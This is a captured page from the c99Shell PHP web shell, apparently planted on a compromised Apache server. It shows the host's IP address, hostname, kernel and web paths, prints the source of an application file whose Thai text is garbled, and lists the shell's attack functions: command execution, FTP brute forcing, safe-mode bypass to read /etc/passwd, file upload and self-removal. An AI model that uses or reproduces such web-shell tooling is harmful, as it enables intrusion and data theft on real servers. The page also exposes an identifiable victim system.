110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x Free 52.35 GB of 127.8 GB (40.96%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis2222/ums/ drwxr-xr-x
Free 52.35 GB of 127.8 GB (40.96%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: addPathServer.php (2.21 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?PHP
					function update_file ($fpath, $defaultval)
					{
					//include_once("../class/clsConnection.php");
					//	include_once("../class/clsDB.php");
						$retval = false;
						if (file_exists($fpath))
							unlink($fpath);
						if (($handle = fopen($fpath, "wb"))) {
							if (fwrite($handle, $defaultval) === FALSE) {
								if ($handle)
									fclose($handle);
							} else {
								fclose($handle);
								$retval = true;
							}
						}
						return $retval;
					}
					
					function folder_writable ( )
					{
					//include_once("../class/clsConnection.php");
					//	include_once("../class/clsDB.php");					
					$retval = false;
						$file_name = "testwrite_" . time() . ".txt";
						if (($handle = fopen($file_name, "wb"))) {
							$retval = true;
							fclose($handle);
							unlink($file_name);
						}
						return $retval;
					}
					
					
					$save_file = 'lib/nusoap/globalversion.php';
					$server_path="http://".$server_path."/mis/version/admin/send.php";
					$new_path="http://".$new_path."/mis/version/admin/send.php";
					if($method=="editpath"){
						$server_path=$new_path;
					}
					
					
					if (folder_writable()) {
						$content = implode("", @file($save_file));
						$pattern = "/(\\\$GLOBALS\[\\\"SERVER_PATH\\\"\]\s\=\s)(\\\")(.*)(\\\")(\;)/";
						$replaceses = $server_path;
						if (preg_match($pattern,$content)){
							//echo "match";
							$newcontent = preg_replace($pattern, "\${1}\${2}$replaceses\${4}\${5}", $content);
								if (update_file($save_file, $newcontent) == true) {
									if($method=="addpath"){
										echo "<meta http-equiv='refresh' content='0; URL=updateFile.php'>";
									}else if($method=="editpath"){
										?>
										<script language="javascript1.2">	
											window.close();
											window.opener.location.href="updateFile.php";
										</script>
										<?
									}
								}else{
									echo "<div align=\"center\">дБиКТБТГ¶бЎйдўЄЧиНа¤ГЧиН§дґй</div>";
									exit;
								}
								
						}else{
						//not match
							echo "<div align=\"center\">дБиКТБТГ¶бЎйдўЄЧиНа¤ГЧиН§дґй</div>";
							exit;
						}
					} else {
						echo "<div align=\"center\">".getcwd() . " cannot writable!</div>";
						exit;
					}		

?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--